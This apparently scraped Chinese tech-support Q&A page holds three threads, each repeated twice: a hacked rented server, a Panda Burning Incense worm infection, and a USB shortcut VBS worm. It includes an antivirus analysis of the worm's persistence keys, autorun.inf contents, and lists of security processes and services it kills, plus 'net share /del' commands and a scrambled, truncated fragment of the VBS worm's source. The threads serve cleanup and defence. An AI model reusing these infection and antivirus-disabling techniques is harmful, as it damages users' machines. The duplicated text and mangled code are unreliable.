当前位置: 操作系统/服务器>windows
本页文章导读:
▪租用的万网独立主机上数据库和程序全部不见了解决方法 租用的万网独立主机上数据库和程序全部不见了12月31号公司开会的时候万网来电话通知我说尽快备份资料,因为他们发现我的主机系统有问题,要重新安装系统,当时请示了老板,老板说不要紧,.........
▪ 任务管理器消失 arcldr desktop_ini 疯了。该如何解决 任务管理器消失 arcldr desktop_.ini 疯了。。。移动硬盘在机房用了一下拿回来重装系统,结果把我机器整挂了,每个文件 夹下都复制一个desktop_.ini,内容是当前系统时间,C盘出现了arcldr和 a.........
▪ 1KB文件夹快捷方式.vbs病毒!该如何处理 1KB文件夹快捷方式.vbs病毒!!!今天在机房上机,U盘使用后感染了.VBS病毒,表现为在被感染的U盘文件夹上显示1Kb大小的“快捷方式”字样,使用自己NOD32 查杀后,该病毒名为734821704.vbs 病.........
[1]租用的万网独立主机上数据库和程序全部不见了解决方法
来源: 互联网 发布时间: 2014-02-18
租用的万网独立主机上数据库和程序全部不见了
12月31号公司开会的时候万网来电话通知我说尽快备份资料,因为他们发现我的主机系统有问题,要重新安装系统,当时请示了老板,老板说不要紧,元旦放假完了后再备份,结果放假回来发现不能用pcanhwyere连上去了,打电话过去说那个主机缺少几个文件,进不了系统了,技术正在看能不能从别的地方复制这几个文件来进入系统,弄了一天没有解决.
第二天,他们接了一块硬盘上去,进入系统,我用pcanywhere连上发现放D盘和E盘的数据全部不见了,只有一些我没有见过的文件夹,接了新硬盘后盘符变了,对方的解释如下:
"用户不能找到原有数据,我们为其做了检查,应为病毒、木马或被攻击等原因导致,附件为对其硬盘进行检查的结果。
原C、D、E盘对应现在的 F、E、D盘
附件中为我们检查到用户主机上当前还有的文件,文件最后访问是在 2006年12月31日凌晨3点20分,不可能是我们造成的损坏。当天用户提出检查系统,此时服务器已无法启动。后面的数据为2007年1月4日我们安装 sql 添加上的,并不会影响用户的原有数据。
请向用户解释,数据丢失非我方责任,对此我们也无能为力。 "
我看了下,现在的F盘也就是原来的C盘东西都还在,但是原来的D\E盘里面的东西都不对了,我的网站代码都是放D盘,数据库放E盘,还有数据库的自动备份也在E盘,现在统统不见了,剩下的文件情况如下:
以前的D盘(现在的E盘)内容只剩下:recycler\system volume information\80.reg
以前的E盘(现在的D盘)内容只剩下:recycler\system volume information\,然后万网的人在这个盘上新装了sql server 2000
问他们有没有恢复过数据,他们说试过了,没有恢复的可能了.
现在我想问的是,造成这个的原因是什么?病毒?木马?系统崩溃?黑客?我用什么方法可以看这个80.reg文件,它的时间正好是出问题的那个时间,也许有点帮助.
RAdmin.....说明你被黑了.
Remote Administrator 的最新客户端,可以远程控制你的计算机,你可以在本地看见远程计算机的屏幕显示,本地的鼠标、键盘的有关反应也会传送到远程计算机。
它有以下特点:
1.运行速度快。
2.Radmin支持被控端以服务的方式运行、支持多个连接和IP 过滤(即允许特定的IP控制远端机器)、个性化的文件互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等。
3.在安全性方面,Radmin支持Windows NT/2000用户级安全特性,您可以将远程控制的权限授予特定的用户或者用户组,Radmin将以加密的模式工作,所有的数据(包括屏幕影像、鼠标和键盘的移动)都使用128位强加密算法加密; 服务器端会将所有操作写进日志文件,以便于事后查询,服务器端有IP过滤表,对IP过滤表以外的控制请求将不予响应。
4.Radmin 目前支持TCP/IP协议,应用十分广泛。
这个就设计到服务器安全了
1 程序漏洞
2 系统漏洞 很大可能都是程序漏洞
3 本着尽量少开放权限就可以了 多找些资料看一下 这方面资料很多的
4 数据务必备份
12月31号公司开会的时候万网来电话通知我说尽快备份资料,因为他们发现我的主机系统有问题,要重新安装系统,当时请示了老板,老板说不要紧,元旦放假完了后再备份,结果放假回来发现不能用pcanhwyere连上去了,打电话过去说那个主机缺少几个文件,进不了系统了,技术正在看能不能从别的地方复制这几个文件来进入系统,弄了一天没有解决.
第二天,他们接了一块硬盘上去,进入系统,我用pcanywhere连上发现放D盘和E盘的数据全部不见了,只有一些我没有见过的文件夹,接了新硬盘后盘符变了,对方的解释如下:
"用户不能找到原有数据,我们为其做了检查,应为病毒、木马或被攻击等原因导致,附件为对其硬盘进行检查的结果。
原C、D、E盘对应现在的 F、E、D盘
附件中为我们检查到用户主机上当前还有的文件,文件最后访问是在 2006年12月31日凌晨3点20分,不可能是我们造成的损坏。当天用户提出检查系统,此时服务器已无法启动。后面的数据为2007年1月4日我们安装 sql 添加上的,并不会影响用户的原有数据。
请向用户解释,数据丢失非我方责任,对此我们也无能为力。 "
我看了下,现在的F盘也就是原来的C盘东西都还在,但是原来的D\E盘里面的东西都不对了,我的网站代码都是放D盘,数据库放E盘,还有数据库的自动备份也在E盘,现在统统不见了,剩下的文件情况如下:
以前的D盘(现在的E盘)内容只剩下:recycler\system volume information\80.reg
以前的E盘(现在的D盘)内容只剩下:recycler\system volume information\,然后万网的人在这个盘上新装了sql server 2000
问他们有没有恢复过数据,他们说试过了,没有恢复的可能了.
现在我想问的是,造成这个的原因是什么?病毒?木马?系统崩溃?黑客?我用什么方法可以看这个80.reg文件,它的时间正好是出问题的那个时间,也许有点帮助.
RAdmin.....说明你被黑了.
Remote Administrator 的最新客户端,可以远程控制你的计算机,你可以在本地看见远程计算机的屏幕显示,本地的鼠标、键盘的有关反应也会传送到远程计算机。
它有以下特点:
1.运行速度快。
2.Radmin支持被控端以服务的方式运行、支持多个连接和IP 过滤(即允许特定的IP控制远端机器)、个性化的文件互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等。
3.在安全性方面,Radmin支持Windows NT/2000用户级安全特性,您可以将远程控制的权限授予特定的用户或者用户组,Radmin将以加密的模式工作,所有的数据(包括屏幕影像、鼠标和键盘的移动)都使用128位强加密算法加密; 服务器端会将所有操作写进日志文件,以便于事后查询,服务器端有IP过滤表,对IP过滤表以外的控制请求将不予响应。
4.Radmin 目前支持TCP/IP协议,应用十分广泛。
这个就设计到服务器安全了
1 程序漏洞
2 系统漏洞 很大可能都是程序漏洞
3 本着尽量少开放权限就可以了 多找些资料看一下 这方面资料很多的
4 数据务必备份
[2] 任务管理器消失 arcldr desktop_ini 疯了。该如何解决
来源: 互联网 发布时间: 2014-02-18
任务管理器消失 arcldr desktop_.ini 疯了。。。
移动硬盘在机房用了一下拿回来重装系统,结果把我机器整挂了,每个文件
夹下都复制一个desktop_.ini,内容是当前系统时间,C盘出现了arcldr和
arcsetup两个文件,倒是可以删除,但desktop_.ini会自动生成,刚一开始
发现移动硬盘目录下有autorun,熊猫烧香图标,去网上找了个专杀,程序运
行就当掉,再一看任务管理器挂了,regedit挂了,winprocess挂了,能搞丫
的都他妈的挂了(2kpro没msconfig,估计有也得挂)。把移动硬盘拿去同事
那里杀度,最新的瑞星2007,杀出来一堆html文件的病毒,desktop_.ini一
个都没删,庆幸他的机器还没事儿。系统分区都删了全格,刚装完还没事儿
,移动硬盘一插又over了(瑞星在里面,不插不行啊)我都快疯了,没见过
这么nb的病毒还,专干能搞丫的,QQ能装,TTPlayer能装,就瑞星和优化大师不能装,最不可思议的是我刚才在这里发贴子,在问题栏里输入“
任务管理器“直接IE挂掉。。。逼的我现在在记事本里敲,妈的犯了人品了
。。要不是分不够了等级太低真想给200,谁告诉我到底这是什么玩意儿阿,
不要是病毒,是木马,装个什么什么插件的,哪儿有专杀拜托了,能搞定的
话实在不行我硬盘低格都行,疯了。。。
试试kaka助手
瑞星熊猫烧香专杀工具
http://www.p234.com/Soft/cygj/200612/66.html
江民熊猫烧香专杀工具
http://www.p234.com/Soft/rjxz/200612/68.html
金山熊猫烧香专杀工具
http://www.p234.com/Soft/cygj/200612/67.html
熊猫烧香病毒变种 spoclsv.exe
病毒大小:22,886 字节
加壳方式:UPack
样本MD5:9749216a37d57cf4b2e528c027252062
样本SHA1:5d3222d8ab6fc11f899eff32c2c8d3cd50cbd755
发现时间:2006.11
更新时间:2006.11
关联病毒:
传播方式:通过恶意网页传播,其它木马下载,可通过局域网、移动存储设备等传播
技术分析
==========
又是“熊猫烧香”FuckJacks.exe的变种,和之前的变种一样使用白底熊猫烧香图标,病毒运行后复制自身到系统目录下:
%System%\drivers\spoclsv.exe
创建启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare "= "%System%\drivers\spoclsv.exe "
修改注册表信息干扰“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue "=dword:00000000
在各分区根目录生成副本:
X:\setup.exe
X:\autorun.inf
autorun.inf内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
尝试关闭下列窗口:
QQKav
QQAV
VirusScan
Symantec AntiVirus
Duba
Windows
esteem procs
System Safety Monitor
Wrapped gift Killer
Winsock Expert
msctls_statusbar32
pjf(ustc)
IceSword
结束一些对头的进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
禁用一系列服务:
Schedule
sharedaccess
RsCCenter
RsRavMon
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
删除若干安全软件启动项信息:
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStatEXE
YLive.exe
yassistse
使用net share命令删除管理共享:
net share X$ /del /y
net share admin$ /del /y
net share IPC$ /del /y
遍历目录,感染除以下系统目录外其它目录中的exe、com、scr、pif文件:
X:\WINDOWS
X:\Winnt
X:\System Volume Information
X:\Recycled
%ProgramFiles%\Windows NT
移动硬盘在机房用了一下拿回来重装系统,结果把我机器整挂了,每个文件
夹下都复制一个desktop_.ini,内容是当前系统时间,C盘出现了arcldr和
arcsetup两个文件,倒是可以删除,但desktop_.ini会自动生成,刚一开始
发现移动硬盘目录下有autorun,熊猫烧香图标,去网上找了个专杀,程序运
行就当掉,再一看任务管理器挂了,regedit挂了,winprocess挂了,能搞丫
的都他妈的挂了(2kpro没msconfig,估计有也得挂)。把移动硬盘拿去同事
那里杀度,最新的瑞星2007,杀出来一堆html文件的病毒,desktop_.ini一
个都没删,庆幸他的机器还没事儿。系统分区都删了全格,刚装完还没事儿
,移动硬盘一插又over了(瑞星在里面,不插不行啊)我都快疯了,没见过
这么nb的病毒还,专干能搞丫的,QQ能装,TTPlayer能装,就瑞星和优化大师不能装,最不可思议的是我刚才在这里发贴子,在问题栏里输入“
任务管理器“直接IE挂掉。。。逼的我现在在记事本里敲,妈的犯了人品了
。。要不是分不够了等级太低真想给200,谁告诉我到底这是什么玩意儿阿,
不要是病毒,是木马,装个什么什么插件的,哪儿有专杀拜托了,能搞定的
话实在不行我硬盘低格都行,疯了。。。
试试kaka助手
瑞星熊猫烧香专杀工具
http://www.p234.com/Soft/cygj/200612/66.html
江民熊猫烧香专杀工具
http://www.p234.com/Soft/rjxz/200612/68.html
金山熊猫烧香专杀工具
http://www.p234.com/Soft/cygj/200612/67.html
熊猫烧香病毒变种 spoclsv.exe
病毒大小:22,886 字节
加壳方式:UPack
样本MD5:9749216a37d57cf4b2e528c027252062
样本SHA1:5d3222d8ab6fc11f899eff32c2c8d3cd50cbd755
发现时间:2006.11
更新时间:2006.11
关联病毒:
传播方式:通过恶意网页传播,其它木马下载,可通过局域网、移动存储设备等传播
技术分析
==========
又是“熊猫烧香”FuckJacks.exe的变种,和之前的变种一样使用白底熊猫烧香图标,病毒运行后复制自身到系统目录下:
%System%\drivers\spoclsv.exe
创建启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare "= "%System%\drivers\spoclsv.exe "
修改注册表信息干扰“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue "=dword:00000000
在各分区根目录生成副本:
X:\setup.exe
X:\autorun.inf
autorun.inf内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
尝试关闭下列窗口:
QQKav
QQAV
VirusScan
Symantec AntiVirus
Duba
Windows
esteem procs
System Safety Monitor
Wrapped gift Killer
Winsock Expert
msctls_statusbar32
pjf(ustc)
IceSword
结束一些对头的进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
禁用一系列服务:
Schedule
sharedaccess
RsCCenter
RsRavMon
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
删除若干安全软件启动项信息:
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStatEXE
YLive.exe
yassistse
使用net share命令删除管理共享:
net share X$ /del /y
net share admin$ /del /y
net share IPC$ /del /y
遍历目录,感染除以下系统目录外其它目录中的exe、com、scr、pif文件:
X:\WINDOWS
X:\Winnt
X:\System Volume Information
X:\Recycled
%ProgramFiles%\Windows NT
[3] 1KB文件夹快捷方式.vbs病毒!该如何处理
来源: 互联网 发布时间: 2014-02-18
1KB文件夹快捷方式.vbs病毒!!!
今天在机房上机,U盘使用后感染了.VBS病毒,表现为在被感染的U盘文件夹上显示1Kb大小的“快捷方式”字样,使用自己NOD32 查杀后,该病毒名为734821704.vbs 病毒体被NOD32 隔离后,本以为就恢复了文件夹原本的面貌,但是显然想法太单纯了,因为双击被查杀后的文件夹后,提示“该快捷方式所指向的项目“734821704.vbs已经更改或移动,因此该快捷方式无法正常工作 是否删除该快捷方式?””我知道是该快捷方式覆盖掉了原本的文件夹,病毒隔离后才出现这个状况,千万不能按提示删除它,否则就是删除了自己宝贵的文件夹内容……
我在网上大概看了下该种类型的病毒,七七八八说了一堆,也较可信的下载了“1KB文件夹快捷方式病毒清除专用附件.rar(http://bbs.ikaka.com/attachment.aspx?attachmentid=564690)”和“vbs快捷方式专杀.rar”,但是迫于经验缘故,对于确实的查杀恢复效果,没有把握,所以想先来这儿问问兄弟们,不知道有些什么建议和经验。
###################################################################################
###################################################################################
呵呵,让我碰到你这个问题了!我也遇见过,但成功的清除了!下面是我总结的内容,看看吧,百分之百管用!
这种病毒,不窃取你的数据,就是很会搞破坏!电脑里无论哪个分区,其根目录下的文件夹均会受到它的破坏!破坏方式很简单:将每一个分区根目录下的每一个文件夹创建快捷方式,然后将源文件夹加上系统、隐藏属性!
这种病毒传播极为迅速,主要方式:移动设备传播。所到之处,存储设备根目录下文件夹无一幸免!
这种病毒,我已经接触到了好几次!最初是U盘受感染,拿到一个“装有杀毒软件”的计算机上手动处理后,“丢失的文件”被找回!但如果一台个人电脑上的文件受到感染,文件少的话还好说,文件多的话就麻烦了,不过怎么着,都能被解决的!由于病毒可以自我复制,每个分区根目录下均有副本,而且副本之间相互关联,删除一个后,会马上被恢复!实在令人厌烦....
电脑正常启动时无法进行删除,我们可以进入安全模式手动删除文件!进入安全模式后,打开我的电脑,选择“工具”菜单项,选择“文件夹选项”选项卡,在“查看”里,将“隐藏受保护的操作系统文件”前的对号去掉,选择“显示所有文件和文件夹”!然后回到电脑分根目录下,看到了吧,所有隐藏的文件都被显示了出来,删除所有快捷方式!从开始中打开“运行”,用
attrib f:\* -s -h /s /d(f:\*为路径,指的是f盘根目录下所有文件)去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和
“autorun.inf”!然后重启计算机,看吧!问题解决了...
防范措施:U盘对病毒的传播要借助autorun.inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它,我提到的方法就是,在根目录下,删除autorun.inf文件,然后,根目下建立一个文件夹,名字就叫autorun.inf,这样一来,因为在同一目录下,病毒就无能为力,创建不了autorun.inf文件了,以后会不会出新病毒,自动去删文件夹,然后再建立文件就不知道了,但至少现阶段,这种方法是非常有效的。但是,由于这个文件夹可以被改名,因此许多新的木马和病毒采用改名后再创建autorun.inf文件来达到感染U盘的目的。不过对于安全意识强的用户,用这种方法来判断自己的U盘是否遭到感染也未尝不可。
###################################################################################
###################################################################################
###################################################################################
###################################################################################
上面有一部分有点乱哈!整理如下:
从开始中打开“运行”,用 attrib f:\* -s -h /s /d (f:\*为路径,指的是f盘根目录下所有文件) 去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和 “autorun.inf”删除!
###################################################################################
###################################################################################
打开病毒的VBS文件,阅读它的源代码,自己写一个专杀。
关闭NOD32的主动防御,进NOD32的隔离,把这个734821704.vbs文件回复,右击选择编辑,然后把内容发上来给大家伙看看吧。。
这就是他的源码。。。大家看看,,,我也中了它!
'偶给要不 ',号外起乱名文中的我,风暴叫字名文英的我yoB叫字.eniF-_- 5
'rorrE nO emuseR txeN8
'sF miDShsW,oS:llehosF tetaerC=cejbOeRcs "(tGniTPisELif.oMeTsy "TcEjB teS:)ehShsWerC=lljbOetaw "(tceTpiRcSLleHS.laC:) "niaM l)(6
'(niaM buS)9
'rorrE nO emuseR miD:txeNV ,sgrA daoLsuriAsuriV ,A teS:ssrcSW=sgrugrA.tpiiV:stnem=daoLsurVniaMteG:)1(surissAsuriVniaMteG=)0(suriV=muNgrA:ihW oD:0uNgrA elsgrA < mP:tnuoC.raP=maraA& " "&maNgrA(sgrNgrA:)muuNgrA=muoL:1 + mpo8
'raPbuSaCL=magiR(esraP(th)3 ,ma)6
'aC tceleSraPbuS esma9
'aCes " ur "n2
'htaPnuRW(tfeL=.tpircSFtpircSemaNlluaC:)2 ,(nuR llhtaPnuR llaC:)SedavnIV(metsyaoLsurisuriV,daC:)ssA(nuR lletsyS% "\%tooRm\metsystsohcvs& " exe.oLsuriV)da7
't " esaCl " , "txni ", "goni ", "i "f7
今天在机房上机,U盘使用后感染了.VBS病毒,表现为在被感染的U盘文件夹上显示1Kb大小的“快捷方式”字样,使用自己NOD32 查杀后,该病毒名为734821704.vbs 病毒体被NOD32 隔离后,本以为就恢复了文件夹原本的面貌,但是显然想法太单纯了,因为双击被查杀后的文件夹后,提示“该快捷方式所指向的项目“734821704.vbs已经更改或移动,因此该快捷方式无法正常工作 是否删除该快捷方式?””我知道是该快捷方式覆盖掉了原本的文件夹,病毒隔离后才出现这个状况,千万不能按提示删除它,否则就是删除了自己宝贵的文件夹内容……
我在网上大概看了下该种类型的病毒,七七八八说了一堆,也较可信的下载了“1KB文件夹快捷方式病毒清除专用附件.rar(http://bbs.ikaka.com/attachment.aspx?attachmentid=564690)”和“vbs快捷方式专杀.rar”,但是迫于经验缘故,对于确实的查杀恢复效果,没有把握,所以想先来这儿问问兄弟们,不知道有些什么建议和经验。
###################################################################################
###################################################################################
呵呵,让我碰到你这个问题了!我也遇见过,但成功的清除了!下面是我总结的内容,看看吧,百分之百管用!
这种病毒,不窃取你的数据,就是很会搞破坏!电脑里无论哪个分区,其根目录下的文件夹均会受到它的破坏!破坏方式很简单:将每一个分区根目录下的每一个文件夹创建快捷方式,然后将源文件夹加上系统、隐藏属性!
这种病毒传播极为迅速,主要方式:移动设备传播。所到之处,存储设备根目录下文件夹无一幸免!
这种病毒,我已经接触到了好几次!最初是U盘受感染,拿到一个“装有杀毒软件”的计算机上手动处理后,“丢失的文件”被找回!但如果一台个人电脑上的文件受到感染,文件少的话还好说,文件多的话就麻烦了,不过怎么着,都能被解决的!由于病毒可以自我复制,每个分区根目录下均有副本,而且副本之间相互关联,删除一个后,会马上被恢复!实在令人厌烦....
电脑正常启动时无法进行删除,我们可以进入安全模式手动删除文件!进入安全模式后,打开我的电脑,选择“工具”菜单项,选择“文件夹选项”选项卡,在“查看”里,将“隐藏受保护的操作系统文件”前的对号去掉,选择“显示所有文件和文件夹”!然后回到电脑分根目录下,看到了吧,所有隐藏的文件都被显示了出来,删除所有快捷方式!从开始中打开“运行”,用
attrib f:\* -s -h /s /d(f:\*为路径,指的是f盘根目录下所有文件)去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和
“autorun.inf”!然后重启计算机,看吧!问题解决了...
防范措施:U盘对病毒的传播要借助autorun.inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它,我提到的方法就是,在根目录下,删除autorun.inf文件,然后,根目下建立一个文件夹,名字就叫autorun.inf,这样一来,因为在同一目录下,病毒就无能为力,创建不了autorun.inf文件了,以后会不会出新病毒,自动去删文件夹,然后再建立文件就不知道了,但至少现阶段,这种方法是非常有效的。但是,由于这个文件夹可以被改名,因此许多新的木马和病毒采用改名后再创建autorun.inf文件来达到感染U盘的目的。不过对于安全意识强的用户,用这种方法来判断自己的U盘是否遭到感染也未尝不可。
###################################################################################
###################################################################################
###################################################################################
###################################################################################
上面有一部分有点乱哈!整理如下:
从开始中打开“运行”,用 attrib f:\* -s -h /s /d (f:\*为路径,指的是f盘根目录下所有文件) 去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和 “autorun.inf”删除!
###################################################################################
###################################################################################
打开病毒的VBS文件,阅读它的源代码,自己写一个专杀。
关闭NOD32的主动防御,进NOD32的隔离,把这个734821704.vbs文件回复,右击选择编辑,然后把内容发上来给大家伙看看吧。。
这就是他的源码。。。大家看看,,,我也中了它!
'偶给要不 ',号外起乱名文中的我,风暴叫字名文英的我yoB叫字.eniF-_- 5
'rorrE nO emuseR txeN8
'sF miDShsW,oS:llehosF tetaerC=cejbOeRcs "(tGniTPisELif.oMeTsy "TcEjB teS:)ehShsWerC=lljbOetaw "(tceTpiRcSLleHS.laC:) "niaM l)(6
'(niaM buS)9
'rorrE nO emuseR miD:txeNV ,sgrA daoLsuriAsuriV ,A teS:ssrcSW=sgrugrA.tpiiV:stnem=daoLsurVniaMteG:)1(surissAsuriVniaMteG=)0(suriV=muNgrA:ihW oD:0uNgrA elsgrA < mP:tnuoC.raP=maraA& " "&maNgrA(sgrNgrA:)muuNgrA=muoL:1 + mpo8
'raPbuSaCL=magiR(esraP(th)3 ,ma)6
'aC tceleSraPbuS esma9
'aCes " ur "n2
'htaPnuRW(tfeL=.tpircSFtpircSemaNlluaC:)2 ,(nuR llhtaPnuR llaC:)SedavnIV(metsyaoLsurisuriV,daC:)ssA(nuR lletsyS% "\%tooRm\metsystsohcvs& " exe.oLsuriV)da7
't " esaCl " , "txni ", "goni ", "i "f7
最新技术文章: